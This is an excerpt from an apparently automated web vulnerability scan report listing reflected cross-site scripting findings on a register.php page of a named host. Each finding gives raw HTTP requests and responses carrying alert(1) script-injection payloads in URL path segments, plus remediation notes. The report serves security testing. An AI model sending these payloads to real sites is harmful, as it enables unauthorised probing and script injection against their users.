GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C3aa99%3balert(1)//3e00e5c246a/images/icons/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:12 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<3aa99;alert(1)//3e00e5c246a/images/icons/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.209. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 181bc%3balert(1)//20be249555b was submitted in the REST URL parameter 3. This input was echoed as 181bc;alert(1)//20be249555b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images181bc%3balert(1)//20be249555b/icons/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:15:44 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images181bc;alert(1)//20be249555b/icons/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.210. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b7c6"-alert(1)-"c002ab44339 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images2b7c6"-alert(1)-"c002ab44339/icons/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:57 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images2b7c6"-alert(1)-"c002ab44339/icons/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.211. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da76"-alert(1)-"6662331f607 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons5da76"-alert(1)-"6662331f607/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:03 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons5da76"-alert(1)-"6662331f607/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.212. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c2837%3balert(1)//e5b5a6f8428 was submitted in the REST URL parameter 4. This input was echoed as c2837;alert(1)//e5b5a6f8428 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/iconsc2837%3balert(1)//e5b5a6f8428/key_go.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:18:17 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/iconsc2837;alert(1)//e5b5a6f8428/key_go.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.213. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8eaa9%3balert(1)//b81cbc5f155 was submitted in the REST URL parameter 5. This input was echoed as 8eaa9;alert(1)//b81cbc5f155 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png8eaa9%3balert(1)//b81cbc5f155 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:21:55 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/key_go.png8eaa9;alert(1)//b81cbc5f155?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.214. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 375fa"-alert(1)-"5ac38691248 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png375fa"-alert(1)-"5ac38691248 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:20:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/key_go.png375fa"-alert(1)-"5ac38691248?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.215. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3055c"-alert(1)-"93122f013fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C3055c"-alert(1)-"93122f013fc/images/icons/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:04:05 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<3055c"-alert(1)-"93122f013fc/images/icons/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.216. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 433f0%3balert(1)//14084ca8057 was submitted in the REST URL parameter 2. This input was echoed as 433f0;alert(1)//14084ca8057 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C433f0%3balert(1)//14084ca8057/images/icons/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:07:08 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<433f0;alert(1)//14084ca8057/images/icons/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.217. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 792ef"><script>alert(1)</script>e1f3d67c07a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/792ef"><script>alert(1)</script>e1f3d67c07a/images/icons/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/792ef"><script>alert(1)</script>e1f3d67c07a/images/icons/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.218. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bcedc%3balert(1)//6543e4084bb was submitted in the REST URL parameter 3. This input was echoed as bcedc;alert(1)//6543e4084bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesbcedc%3balert(1)//6543e4084bb/icons/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:40 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesbcedc;alert(1)//6543e4084bb/icons/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.219. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9757"-alert(1)-"045df674128 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesf9757"-alert(1)-"045df674128/icons/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:12 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesf9757"-alert(1)-"045df674128/icons/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.220. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b8c9"-alert(1)-"3ea4e91969 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons9b8c9"-alert(1)-"3ea4e91969/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:20 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons9b8c9"-alert(1)-"3ea4e91969/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

